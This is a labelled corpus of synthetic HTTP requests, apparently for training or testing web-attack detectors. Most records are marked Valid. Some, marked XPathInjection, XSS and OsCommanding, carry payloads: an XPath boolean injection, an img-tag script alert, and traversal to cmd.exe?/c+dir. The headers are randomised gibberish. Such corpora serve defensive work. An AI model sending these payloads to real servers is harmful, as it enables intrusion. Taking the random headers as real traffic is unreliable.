Warning: 396 www.oinrDed.jpg "exeiei" 
X-Forwarded-For: 234.13.70.211
X-Serial-Number: 8391965
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

idssb=126643&lest4i5sOreteh=dmtztt&dunu0admtW8=69198680&eganwosVw5eele=5w26&inywmeBeiieatol=seto&ae1NQr=nvre

End - Id: 34175
Start - Id: 25380
class: Valid
GET /PuvbbB2CetcrhNR72/tH3o2LGMogomgFXD8/iMS.Xl/onT4K2rlS/uBX.html?ygnrrfetso=424&aa=h HTTP/1.0
Host: www.mhngaesv.it
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.1, iso-8859-8-i, iso-8859-8-i;q=0.3
Accept-Encoding: *
Accept-Language: im-2sdno;q=0.1
Cache-Control: min-fresh=925
Client-ip: 116.243.195.61
Cookie: i7rtuha=8;tifys=627;t1aia6tsst=wwPH
Cookie2: $Version="54"
Date: Wed, 25 May 05 19:47:12 UTC
ETag: W/"Z2pOfs9CyNAb1oA"
Expect: mcontts
From: rrhs@lfj0yeitrn.cz
If-Modified-Since: Thu, 03 Apr 08 15:08:59 UTC
If-Unmodified-Since: Sat, 10 Mar 07 03:31:59 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Mar 05 22:15:38 GMT
Max-Forwards: 464
MIME-Version: 3.9
Pragma: 94aO=tec4t
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: NTLM ZW9vcmhJbGFvczdzZXRhZWVzcW40aWVvdG51ckVuZTN3cmRld2V0OWVDZWFlbg==
Range: -56,7038-30457
Referer: http://www.caxsiLxE.de/ehnze/ujm36t/tDEDr/gw0tajte/nznH.jpg
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.1 (compatible; Konqueror/6.8; Solaris; i1skizr)
UA-CPU: 68000
UA-Disp: 071,871,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 894x439
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: mpthd; ie52=yuninne
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 912 www.oae7p.js "tows0eecop" "Sun, 06 Nov 05 24:11:34 UTC"
X-Forwarded-For: 150.249.43.63
X-Serial-Number: 1603142835100231
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25380
Start - Id: 20616
class: Valid
GET /ssPJ5Ysu23oBYajFU/sTplVxcm.mdb?ow0fna0itrNnn=%25meta&gLRO@CHo=283&rpyeu=55227&rrtultt9=%25z%3Agvbscript%28hhz4ee&logK0mQ4Z=rv%3D%5BOa%26rbodyi&io=urys&ssRnslr2rd=ne4j-jyF8Th&lzo3gedocument=d5irOky&iiE=781192&Hd=uVjLTA0i&VNRbchildL=auh.Rxr HTTP/1.1
Host: www.IseI.cz
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew, koi8;q=0.2, iso-8859-3, windows-1255
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 199.7.219.227
Cookie: nhrbhhetzrOsE=21589450;mu0hih61iln2a=moUO;ofe=aa9esnsnexirwl1o5;Af5xt0=5;naeE1prdmlhTeks=dtewt-xespi 1oTh;rbedIne=eyrnB7TgBy
Cookie2: $Version="26"
Date: Wed, 07 Jan 09 10:58:51 GMT
ETag: W/"PtPYss6oLyCO0@yY8mJK"
Expect: 100-continue
From: aosan5@ntG2.uk
If-Modified-Since: Sun, 27 Sep 09 03:47:31 UTC
If-Unmodified-Since: Sat, 01 Sep 07 16:12:02 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 151
MIME-Version: 0.4
Pragma: rftom='E8hnrc4i'
Proxy-Authorization: sRah gaho=eeosctBp
Authorization: NTLM MWlpbk5lcmlsSTJkTm9lRWxpZWwyZVBOZndlYmVBdHZhM3N1MmVUcWljNQ==
Range: 8188-
Referer: /omjM00e/to7hss/7jept/ed4eue.mspx
TE: trailers,trailers
Trailer: Connection
User-Agent: oCm@ou http://www.opnqe.biz
UA-CPU: StrongARM
UA-Disp: 6133,0939,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0248x724
Via: FTP/6.3 180.207.137.145, HTTP/7.3 137.98.107.236, HTTP/7.4 www.8w3oixo.png:320
Transfer-Encoding: identity
Upgrade: doTsa/2.7, brr8a/3.0
Warning: 104 www.wOxi.css "Stzenefdraceotte" "Tue, 15 Dec 09 22:09:32 CET"
X-Forwarded-For: 253.194.175.71
X-Serial-Number: 999844116491308
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20616
Start - Id: 9823
class: Valid
GET /qX6dCler/pbinEeraaEx/c6ng/oy4/sAepoEqtb2dooezh6us/mLI/JGBAb/ufgo/utaourbpIljshneoegmd/1JObK-d/h.U81yINkpisHGBe1ctm.jsp? HTTP/1.0
Host: 71.24.126.178
Connection: keep-alive
Accept: video/*
Accept-Charset: big5, windows-1252;q=0.1, utf-8, x-mac-chinesetrad;q=0.3
Accept-Encoding: *
Accept-Language: Ry-tdHtb;q=0.7, 0i-tb;q=0.7, c1iSdxy-eawnelev;q=0.6
Cache-Control: max-age=89
Client-ip: 154.226.115.13
Cookie: bnielOatpnr7=jvyRzw;meyuehNWdq0em=m9l;Ateaeyhnsl=2V1NmzaqX4;chSnwa5j=el.hKl8-lc35
Cookie2: $Version="48"
Date: Sat, 27 May 06 05:12:35 UTC
ETag: W/"Yen6HXQEpi1sTb5"
Expect: eEi2etos=tniHa;trhne=tustf1a
From: s2ee@yeibttnums.uk
If-Modified-Since: Mon, 10 Jul 06 04:55:24 UTC
If-Unmodified-Since: Fri, 13 Feb 04 10:55:18 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 29 Aug 06 07:28:05 UTC
Max-Forwards: 963
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest qop=dARhoRu
Authorization: Digest realm
Range: -6
Referer: http://th2i.biz/ycei/a1r9e/cntEus.asp
TE: chunked,trailers,chunked
Trailer: Via
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 1.2; Re-6a; rv:1.8.0) Gecko/80611414
UA-CPU: x86
UA-Disp: 197,9034,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 3832x6503
Via: FTP/0.2 2.51.180.216:970
Transfer-Encoding: lots9
Upgrade: irldv/6.7
Warning: 093 www.qy84ose.js "sotfb3eWg" "Sat, 25 Dec 04 19:24:10 UTC"
X-Forwarded-For: 239.251.116.128
X-Serial-Number: 09946739061718
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9823
Start - Id: 28474
class: Valid
GET /1g/altnSi/hpcAuwsinser/OT/5-Y6FTLflocationW.nsf?ehaHs9eieiwndc=qea%7E%5Bt&s3Zmteseiberon=38&ogsahCtissu53=yrttevaliqtbtzreplaceri&eR=teo&dartEhnn8diqfet=x%3A HTTP/1.1
Host: 135.220.1.225:34882
Connection: close
Accept: application/rtf;q=0.0, audio/basic;q=0.6, text/*;q=0.5
Accept-Charset: windows-1257, ks_c_5601-1987;q=0.4
Accept-Encoding: *;q=0.1
Accept-Language: rtkei-ell;q=0.3, tlI-nvnorAdr, jejqrj-eigg, bloah-ea
Cache-Control: max-age=8966
Client-ip: 160.213.172.45
Cookie: 6PuttacdRmh=671540;7dBFPM=t
Cookie2: $Version="5"
Date: Tue, 20 Jun 06 15:31:44 CET
ETag: W/"4oMQV_ux-KoTLYo16"
Expect: 100-continue
From: zneku@9etnnTes8.it
If-Modified-Since: Sat, 31 Dec 05 16:02:04 CET
If-Unmodified-Since: Tue, 03 Mar 09 16:01:09 CET
If-Match: "qiRYjB1M535LhuB"
If-None-Match: "R8dtEqeVgsDFay0rZi"
If-Range: *
Max-Forwards: 4855
MIME-Version: 1.7
Pragma: 67intl2=moi2e
Proxy-Authorization: oterIs cdpe=ll2ore
Authorization: NTLM ZWVzNmh0bjlYb2FldGhydW5oajNvaTV0ODZvaG82b2tjaXpvYW9v
Range: 51205-,399-
Referer: http://www.nsllaso.be/eip2/nIIeetoa/arWhnat/4em3hthn.sh
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.9 (compatible; Konqueror/2.8; Unix; aufdn2mv)
UA-CPU: 68000
UA-Disp: 2714,6071,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 686x883
Via: 8.3 www.tohaspan.png:80136
Transfer-Encoding: identity
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 489 121.229.92.62 "gfasavwbhatyeEell" "Tue, 13 Apr 04 09:59:47 UTC"
X-Forwarded-For: 243.229.193.59
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28474
Start - Id: 18841
class: Valid
GET /hHL3G1cFIj/onntaELlnneegtshovra/HpzY9Alib6QsystemYv/tXnXstX8/lCQdDitnt/8S-Qcdswz22/eBGb.@G90lS/40PHvCK-FEYz5G/JzTs4UY8/bZPusZ77iACNxfVCt.png? HTTP/1.0
Host: 167.102.152.196
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, deflate;q=0.2, compress
Accept-Language: a-E;q=0.6, i-8tlaeya9;q=0.4, rdn42he-orefmt, ers-x;q=0.1, eaLtotw-rlcu7;q=0.8
Cache-Control: only-if-cached
Client-ip: 208.166.219.41
Cookie: 3a=899
Cookie2: $Version="1"
Date: Thu, 07 Aug 08 09:41:49 CET
ETag: W/"FfhxfqFGS02zMiOb"
Expect: 100-continue
From: oiir0@raaeopgcl.it
If-Modified-Since: Thu, 17 Dec 09 08:36:04 UTC
If-Unmodified-Since: Wed, 08 Apr 09 13:25:13 CET
If-Match: *
If-None-Match: "muxK-7.pLvFbqo."
If-Range: *
Max-Forwards: 53
MIME-Version: 9.5
Pragma: nay5na=ase
Proxy-Authorization: nrIw tamndt8e=itrl
Authorization: Digest realm
Range: -9,1224-02
Referer: http://eljn416.be/h5rits/Oarza/na7ee/dnody.jsp
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/1.0 (X11; U; Linux i386 0.0; ze-wt; rv:3.6.1) Gecko/17235578
UA-CPU: MIPS
UA-Disp: 4172,660,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2376x8658
Via: 0.7 226.55.29.183:2
Transfer-Encoding: deflate
Upgrade: esnmrn/5.9, onC/4.3, l5Do/0.3, tctit/8.0, toD/4.7
Warning: 911 www.mclwl.shtml "mteatliekhoncjtInek" "Tue, 16 Jan 07 20:18:18 UTC"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18841
Start - Id: 49190
class: XPathInjection
GET /hYbJo_CWaD/Lsrxq/geskucTraezsecoz/ihlsrbiaanjz/nUa5qBz9Vq2wwXqNL.jsp?lbeichrula4rpfm=6277743&NRKM=nonDezAednhms&5p=tye&thp=aootaFdnCets0E&tanzhrlhtgeilH=%26e3pen%5Breplace&fegNssasusa0=p03+tenulloe&lsoiysT=th0-GwbaBjEa&6gqtcbsu=52977028&TtlTtcr=87859&teo=9373181&xae=%5D28h7&5H2K=pToDs&tnc=bOl%7Eme%40tjo%26%25e%5D&nzi9eczVehcmrY=r+s&sFcoahscvms=0+++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++378%3D HTTP/1.0
Host: www.ewctheuR.fr
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis;q=0.7, x-mac-ce;q=0.6, iso-8859-1, x-mac-roman;q=0.9
Accept-Encoding: deflate, deflate;q=0.7, identity
Accept-Language: eUi-t;q=0.6
Cache-Control: max-age=678
Client-ip: 69.171.64.148
Cookie: nctorhe=SnCintEEyHowhrluzo
Cookie2: $Version="8"
Date: Sun, 13 Jun 04 16:51:17 UTC
ETag: "vrp1kGmnEHoBox1Rdwu"
Expect: oSmxlt
From: ir0psea@aO25fruan.gov
If-Modified-Since: Tue, 25 Sep 07 22:58:19 GMT
If-Unmodified-Since: Thu, 17 Nov 05 05:04:01 GMT
If-Match: *
If-None-Match: "3LQ-hCF@CZ49KdqdAEaW"
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 35
MIME-Version: 7.4
Pragma: odoa=ho
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: NTLM TmVhZWNyaTJvOWJBdWFhOTdwVXdzMUtjY3VzZTVncnM3cWU=
Range: 87-,-69535,7135-70843
Referer: /igae/rlhtd/llynl.jpeg
TE: trailers
Trailer: Accept
User-Agent: aqXiNd http://www.On12uoi.biz
UA-CPU: x86
UA-Disp: 809,4297,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 400x881
Via: 0.5 www.jWtx.png
Transfer-Encoding: identity
Upgrade: 1iqlLr/6.5, tlii/7.8, eetsh6/1.2, xr2f/8.0, jok/4.0
Warning: 186 110.57.33.198 "wcete" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49190
Start - Id: 4515
class: Valid
PUT /t@ivsTYmuLtRuxFrOfU.php4? HTTP/1.0
Content-Length: 91
Content-Language: hxo,9i,ctancdpd
Content-Encoding: deflate
Content-Location: /ilcwhv/dvLhadi.cgi
Content-MD5: cG5CNGVlRU50VGx4ZElQdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 18 Jan 06 01:23:42 CET
Last-Modified: Sun, 19 Feb 06 23:01:39 CET
Host: www.mtSdrnbct.uk:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 122.116.121.13
Cookie: X80W=57128;tv=mbasystemadvsp
Cookie2: $Version="322"
Date: Thu, 20 Mar 08 09:43:20 CET
ETag: W/"FmO6gXImXaVVwhaW4p6@"
Expect: eaca
From: de2hc@aRyTe.gov
If-Modified-Since: Tue, 23 Mar 10 21:22:09 GMT
If-Unmodified-Since: Tue, 15 Mar 05 01:51:04 UTC
If-Match: "V0TRWSs.NwnusJq"
If-None-Match: *
If-Range: Wed, 23 Dec 09 11:37:44 UTC
Max-Forwards: 197
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: d6nso iofjtqph=imodlsXg
Authorization: aawcQh naes=aoet
Range: -81622,-19018,7300-85
Referer: http://www.sp1rs.be/tsdo/fnoeidai/rote.jpeg
TE: deflate;q=0.2,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.4 (Windows; U; Win98 6.1; ic-uf; rv:0.6.1) Gecko/90374011
UA-CPU: PowerPC
UA-Disp: 9080,142,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 187x310
Via: HTTP/0.9 118.232.36.242
Transfer-Encoding: compress
Upgrade: aee/7.4, ftmna0/7.5, t4rev/9.4, rrsrls/1.2
Warning: 228 118.255.98.255 "tAmnbuea5ieie3sihw" "Tue, 17 Jun 08 12:35:19 CET"
X-Forwarded-For: 165.210.32.151
X-Serial-Number: 94649830551806
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

p4s.M0za.=546&nd9A=t2bhcmdStduar+7t e&1rnta9srs=413859&7t0hsp=8291&rmuiaeqxnl=nufkhyLqlz.

End - Id: 4515
Start - Id: 47316
class: XSS
GET /ramphgru/9G/fwbcEiers6hmH5mw/tGXV2q9/6swgmyr/ltoeCee/7irhanti/hxKN1AsE3qB29frry/cMqee7Finosia6u9Ryam.gif?dntltessr=edezeFAimtnhrin&3KnrFOstylePyG-=neahaving%3Bu6ni%28d1eam+ea&UyLANh0=063439665&pejhw7=andyse4di&enuieF=65&oxrs=u&CdiRdI=eTy8oR&den51cokIL=117394&iw2otvelmspilva=%3Cimg+++++src+++%3D%22+++livescript%3A%5Balert+++%28%27lhehaE%27%29%3B%5D+%22+++%3E&oeamNto6tood=acm&teosre3stta=unnr9lsncbeeOau&ierx7ontoSereo=2+rot%3Fya&ocnradomrrdo4=0212&mebebtTeertt9nt=jL3LzAt HTTP/1.0
Host: www.Ni2rhrSh6.net
Connection: sism
Accept: */*;q=0.3
Accept-Charset: euc-tw;q=0.5, koi8;q=0.2, iso-10646-ucs-2
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale=18078
Client-ip: 188.124.236.19
Cookie: octrfEElophoih=670;inziylo=uEiN;letsej6eee=2Navebe;ttqeed=cscripteinclude nodeb3qb;n3teORtfliw1=mNsa7T0;e$ei;5qnHiwnrtd=944184
Cookie2: $Version="508"
Date: Fri, 08 Feb 08 12:00:06 GMT
ETag: W/"tViHpc6x1H6fcLzNQ"
Expect: 100-continue
From: ntsn@eneotga.ch
If-Modified-Since: Thu, 26 Feb 09 07:36:01 GMT
If-Unmodified-Since: Mon, 20 Mar 06 19:44:53 GMT
If-Match: *
If-None-Match: *
If-Range: "4lSs8KGSl5z@VumSyP"
Max-Forwards: 4
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic RWo5aG9Zd2s6dWV0Y3NldA==
Range: -827060,69-,229-399617
Referer: /7Faa/e0n9rrOi/otono.wav
TE: chunked
Trailer: Accept-Encoding
User-Agent: BEihah8 (sNivvhVDw; eUPMPD; riu5GUsp; obr8yRf; cn9nOPe)
UA-CPU: Sparc
UA-Disp: 8442,560,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5306x1733
Via: 0.4 www.acty.css, HTTP/1.8 7.17.142.252, 4.4 www.i2fewi.jpeg
Transfer-Encoding: identity
Upgrade: ddnzgk/3.0, pnnt/9.2, eehf/9.2
Warning: 318 www.lawraii.gif:81 "spet7rfthtnscentm3" "Thu, 05 Aug 04 21:32:03 CET"
X-Forwarded-For: 18.209.187.11
X-Serial-Number: 126620
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47316
Start - Id: 36622
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.hedtbto.gov
Connection: keep-alive
Accept: audio/x-wav;q=0.9
Accept-Charset: x-mac-turkish, iso-8859-8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 34.3.142.249
Cookie: 4eehbsjroI0nD=ksQ
Cookie2: $Version="2"
Date: Sat, 31 Jul 04 22:38:41 UTC
ETag: W/"JDtCZoEZuAvr_k5"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Fri, 01 Jan 10 08:05:58 CET
If-Unmodified-Since: Sat, 03 Mar 07 16:07:00 GMT
If-Match: *
If-None-Match: *
If-Range: "HXDma@QQVcMyQKl"
Max-Forwards: 17
MIME-Version: 1.9
Pragma: aastt='ryrw'
Proxy-Authorization: Digest qop=auth-int
Authorization: tDus rndeoby=anuya
Range: -8,4-,75-7
Referer: http://ysueip3.com/esGhxelm/ztiiAFc/nAitnahh/nnusk5i.txt
TE: gzip
Trailer: If-None-Match
User-Agent: pe3sl8Q1 (u_OqnVQ)
UA-CPU: StrongARM
UA-Disp: 427,9941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: cetahi/2.2 102.63.138.220, 5.4 www.lTveiTt.gif, aOAE/2.1 www.Aiieouo.jpeg:5
Transfer-Encoding: deflate
Upgrade: tweo/0.1, sfyot5/8.5
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 24160337067765
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36622
Start - Id: 23783
class: Valid
GET /kBSK_a_XWwAoI1u5CVMB/ergLta/ssprmstohmolrwN/eWFYh5s/synhe/e48gaAPYvIhNu1/nlLxsebk/LoH.ubJZhqQeL/aa.mdb?scriptz.documentxVRoE4l=Rosdseiewraqsrf&zsock_streambin6ogZB@=ctF3vehgc HTTP/1.1
Host: 225.207.5.19
Connection: keep-alive
Accept: video/*, audio/basic;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 94.144.219.198
Cookie: titugiaehEs=ThiL;aeQp7sSSlike.m=6idhrw hc;senh6arLgb=r2cafQB
Cookie2: $Version="5"
Date: Sat, 02 Apr 05 10:16:36 UTC
ETag: "i4BRqekEHQuuPdtmK"
Expect: psTpli=u3iv6e
From: bbeFi@aeis2l.com
If-Modified-Since: Tue, 08 Aug 06 19:23:17 CET
If-Unmodified-Since: Tue, 28 Nov 06 07:13:20 GMT
If-Match: "pGFFdehUqip3rNwJ2"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="teLY"
Authorization: Digest nonce
Range: -9
Referer: http://www.Rcdebge.cz/ctc6/yvq3ep/searrttm.png
TE: gzip;q=0.6
Trailer: Accept-Charset
User-Agent: czaBy/7.7.4.7.5
UA-CPU: 68000
UA-Disp: 3668,047,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 884x6494
Via: 9.9 77.187.247.126, lrdqI/8.4 188.127.101.191, 3.6 www.tmtaf.htm
Transfer-Encoding: compress
Upgrade: oeeuii/6.6, inSid6/6.9, srlses/9.9
Warning: 765 www.oiit7.html:14 "goersPi" 
X-Forwarded-For: 180.65.250.66
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 23783
Start - Id: 4765
class: Valid
PUT /ytt/tSw_D0P/750epUvOpP.KOqi8PVvu/CzhuYJZjhFy/yS4mGAL5u-7Z.IoaXhH/iHmttH3VSCmjhKGlX/dyVv4aiWq.cgi? HTTP/1.0
Content-Length: 268
Content-Language: S,aptatwa
Content-Encoding: compress
Content-Location: /hre4ie.jpeg
Content-MD5: b3J0dWllbWhnajdtaWV0Nw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 17 Nov 04 21:51:38 UTC
Last-Modified: Fri, 26 Jan 07 19:24:22 UTC
Host: 207.164.168.116
Connection: Csaidy
Accept: application/x-tar;q=0.6
Accept-Charset: koi8
Accept-Encoding: 
Accept-Language: as-ak, ric-tz;q=0.8, noog-eic
Cache-Control: max-age=3
Client-ip: 12.225.22.23
Cookie: eesiovnstr7o0h=ots3g
Cookie2: $Version="811"
Date: Wed, 13 May 09 16:35:56 UTC
ETag: "Lp06-M8ta1fgx-q."
Expect: mijtq5m
From: 1ytNpWte@I5qyi.fr
If-Modified-Since: Thu, 22 Mar 07 08:18:17 CET
If-Unmodified-Since: Tue, 22 Nov 05 15:17:56 CET
If-Match: *
If-None-Match: "aaUnMZ.Ls_DxfzfmUS"
If-Range: Tue, 27 Oct 09 21:34:02 CET
Max-Forwards: 9524
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.efttzis.be/nlrez/ltpeh/rkieoIj.gif
Authorization: NTLM WG9lYXNhSWVubnBMZmUwTGE3SU5tV2c3aGJtdDNsZWhzc2h0aGJ0c2FPdHk=
Range: -9054
Referer: /eaybab.exe
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: od8QnkhSrb http://www.i4mhnlo.net
UA-CPU: PowerPC
UA-Disp: 717,3860,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4366x138
Via: tsisee/6.2 79.249.139.15, HTTP/2.7 www.ihRe.shtml, nisseo/4.6 76.12.217.137
Transfer-Encoding: identity
Upgrade: 9atoz/8.5, joee/8.4
Warning: 914 www.0iOmee6i.jpg "ete0anaurongbsa" "Mon, 11 May 09 24:25:22 UTC"
X-Forwarded-For: 247.63.27.49
X-Serial-Number: 573908031855088273
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iobuoeqf21kir=O3wrhi jet-fz&T8rmeipgin=w_LVsra9&dhjesiI=aailrme&8ia=318181&4iazgs=gnt&ZXscriptjI9c= &6anpphnSerleqr=8272&paeshEmb=rftcphp&saudi9ith=79re5q&inygtno0anl=aysnlogsaccept~aroe&FzTP5R=7435&iHdegig=06&nsigneure=e9g5yof'auladmin&h8omfziydnEgE4=yeihzturxazl

End - Id: 4765
Start - Id: 30532
class: Valid
GET /zidie/sIx3p06T/sotaqln4mrs/xB2gbFQb3rSnHo/ae0M7d2x/R@3Qn1Ona4/iShb0apht/Yttauta9/6rRac1atsos8jhsroo/ycurNOnbswRa/lmn3rbaooia9shawiOe.bin?OmPdosu=gRpvE7kr7mxs&t8=0057032&Ao=597830&oeoe=P7+sdss0jo&eosArTosi=AibWnodesX&OsYLwsdLbemE=eee&ofest7=ovbht&95unionxWJr7a=%3Dallnsk HTTP/1.1
Host: www.oe6dna1.com
Connection: keep-alive
Accept: image/*;q=0.0, audio/x-wav, video/*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: md9snnE-hre, 2-mbas, aa-t6ac, iTn-kWT, n-nleyofEu;q=0.6
Cache-Control: no-store
Client-ip: 133.1.177.55
Cookie: rOatS=1744232;aFahraegop=h-9vrHqJvCNO
Cookie2: $Version="6"
Date: Sun, 19 Apr 09 17:42:44 GMT
ETag: W/"NMbAq7Y6uU-.tj9g"
Expect: tnae=Uwms
From: bazsaaR@y3h4ig.st
If-Modified-Since: Sun, 02 May 10 11:43:27 UTC
If-Unmodified-Since: Mon, 25 Feb 08 14:08:36 UTC
If-Match: "_tHk6moevXhiDawb@ez"
If-None-Match: "oHAm8DCnkFcEkb_cihbk"
If-Range: Fri, 10 Oct 08 23:34:42 GMT
Max-Forwards: 9
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM cGFseXRkbGE4c3VvYWhpbzVheW1zb0tFaWVlbnh0dHRkcGJlVW10M3QxbGhlZQ==
Authorization: Basic cGNodDowZWFhaWdtZQ==
Range: -47,-9645,79-6262
Referer: /niuJbn/aiorg/tteeaor0/etynuA/opbnm.jpg
TE: chunked;q=0.5,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/3.2 (Windows; U; WinNT 0.7; l2-OE; rv:2.5.5) Gecko/61276448
UA-CPU: 68000
UA-Disp: 8976,710,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 848x9139
Via: 8.8 www.tot1Hrol.gif
Transfer-Encoding: aw6n6C
Upgrade: psezsR/2.5, pzmc/6.5
Warning: 596 www.e1mel8l.shtml "telnrnohrlong" 
X-Forwarded-For: 175.103.25.65
X-Serial-Number: 60141
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30532
Start - Id: 36561
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.eestRbe.com:242
Connection: etsies
Accept: */*;q=0.6
Accept-Charset: iso-8859-5;q=0.7, euc-kr;q=0.0, cp-950;q=0.5, iso-8859-8-i
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=17
Client-ip: 199.190.231.15
Cookie: j6WQKtdR=d_B7U;madsn=lrRnszyaaS9'i;fnwt0=53888
Cookie2: $Version="910"
Date: Fri, 20 Feb 09 13:57:22 UTC
ETag: "._sHr99T4AKY.QbUteoU"
Expect: e2h0
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Sat, 11 Sep 04 21:16:21 GMT
If-Unmodified-Since: Fri, 26 Aug 05 23:49:43 UTC
If-Match: "TVojOmRAqdYDq9X-"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 9.7
Pragma: eishu=nEn
Proxy-Authorization: 4eitC tieta=unrJ6ewe
Authorization: NTLM bmdpdWx0bGdlZ3R3bzlzc0Vsb2Vhd3E0dXNvZ3dpdWhvZ2F1b3hlYnBTdmk0aTU=
Range: -961935,910376-
Referer: http://6edoaep.it/czxceI/inveotk/d0Hsf/5aaq/ereh.mp3
TE: trailers
Trailer: If-Match
User-Agent: ucpfed (wVkjxOUp; em2slmard; i4RL6k.LF)
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: enogs/8.6 www.tetqra.jpg:2, 3.7 196.40.24.71, 6.1 www.2pocs.jpeg
Transfer-Encoding: identity
Upgrade: iOe8/3.1
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36561
Start - Id: 1930
class: Valid
